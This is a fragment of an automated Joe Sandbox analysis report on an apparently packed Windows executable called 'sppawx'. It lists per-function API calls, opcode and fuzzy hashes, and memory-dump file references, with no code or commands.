                                                                                                                                                                                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction ID: 82133781b8d66feb67c9cea04e4113c02db0436d525814eb16ac41e1d313143c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA110161A09B8181EA20AB35B814069F361BB81BF0F94437DEE7D4B7E8CF3CE0018700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1021210092-0
                                                                                                                                                                                                                              • Opcode ID: 9aec870b7f4277573dccf07976260460dc8d1da0e11b64ac9c67637333db84d1
                                                                                                                                                                                                                              • Instruction ID: f2042d900a213fbf224f5f11ee41ee276ace5714784d2a18a09f13d238c94f76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9aec870b7f4277573dccf07976260460dc8d1da0e11b64ac9c67637333db84d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71012131B18B5192E7309B66E45406D63A4FFC8BA0B584032E95E43F74EE2CD4958700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007C3440closesocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1307566658-0
                                                                                                                                                                                                                              • Opcode ID: 1931c6510799572867503be09faf9a3a2bbe64411395d295934daa13077f4281
                                                                                                                                                                                                                              • Instruction ID: 06ed158067d6a789fc8d8ee90baa3430b98c39417f1a09ed0cb95640bbd46cbe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1931c6510799572867503be09faf9a3a2bbe64411395d295934daa13077f4281
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02F01D21A08B5192E6745B65A84406C6360EF89BB0B1C0736DA7A03FF4EF7CD486C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction ID: aca873f911cabe20a60e08cdb733db224169bb6a783f222007ff70efc026313b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0E08610F1F60653FF347BB2A855138B150AF84740FC540BDDC1D822A1DE2C68858330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 1d7509ee1532f1454ecd7224329401a4908d6d84c1a43419871d158657c5c943
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9218411F2E64243FEB47775A554279B6829F84790FC842BDDE1E873D5CE6CE4458320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction ID: ad9ec76264aea28935b10350e32ed3fb3e8805d39d2e7803bda3676b644f2c5b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041D43291A20187FA34AF35A545279F3A0FB55B44F90417EDF8E83691CF2DE402CB61
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
                                                                                                                                                                                                                              • Instruction ID: 6bfb71484e6a1b8d4f838adcb1625fb6a13e43a7fa028ee07bbe339bd4c1f22f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9721B121B0A65696FA20FA3265043BAF651BF46BC4FCC547CEE4D07786CE3DE0468724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction ID: 6b8bf6177bb9be6ffb9c968d0fcd6f2a0594761ba53678f265a9d87e9241a1d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1316E21A1A65286F7617F75884537CBA60AB80B94FD202BEEE6D033D2DF7CE4418731
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 67f9aabfb1a49d3fd99ff180013b838c2008757056d4f7a47f9ebaafc666cf7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0115122A1E64292FA70BF61940127EF264AF85B80FC440BEEF4C57E96DF3DD6408760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction ID: 9271a2c0a03025514c4abb32fe168842053f75dfb0eee4508278956e07317af4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF219872E1D6818AEB759F28D44137AB660EB84B54F94427CEA5D476D5DF3CD4008B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: 6bd280a2834a2043cdb1af0ed4d72567760e637bd3f66531c0926c4d58f631f1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5601A561A0974141F924EF725902169F691AF86FE0F88867DDE5C17BD6CE3CE5018710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                              • Opcode ID: ac58c37e6a9bad275b34c174a9077f6f6585450ef7728dd028fc21ce204cc036
                                                                                                                                                                                                                              • Instruction ID: 5a9b040caac1a9b7c6df8615105e2206ca7f25b449f4925054a628484d3e3271
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac58c37e6a9bad275b34c174a9077f6f6585450ef7728dd028fc21ce204cc036
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBE01AB1B0464582DB689B1AE59123963A0F748FB5F245736DE3D8B7E0DE28D8E1C340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF79A316466,?,00007FF79A31336E), ref: 00007FF79A319092
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                              • Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                              • Instruction ID: 97f60f9a3af0d094e4784d7733e1e7ca651f193ff6de1abbe1d22fdfc488a427
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3D08C11F2965541FA64FB77BA4A669A251ABCDBC0EC8C03DEE0D03B5ADC3CC0414B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                                                                              • Instruction ID: ac616f82f0b05348264606613aba7e84a8842b7cf62429b4046384087ec83dc3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5821813260879087D354DF26E98025EB7A5FB88BD4F584526EB8847F69CF3CE456CB04
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF79A32B39A,?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA), ref: 00007FF79A32EC5D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                              • Instruction ID: 89a893273a7edb4baca4a044127127f6ccb7cfc2c244ccaf4da8dc15a3e0f0c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF04F50B0B61640FE747AB254922B5B6905FC4B84FDC54BCCD0E462D1DE2CA4808230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF79A320D00,?,?,?,00007FF79A32236A,?,?,?,?,?,00007FF79A323B59), ref: 00007FF79A32D6AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
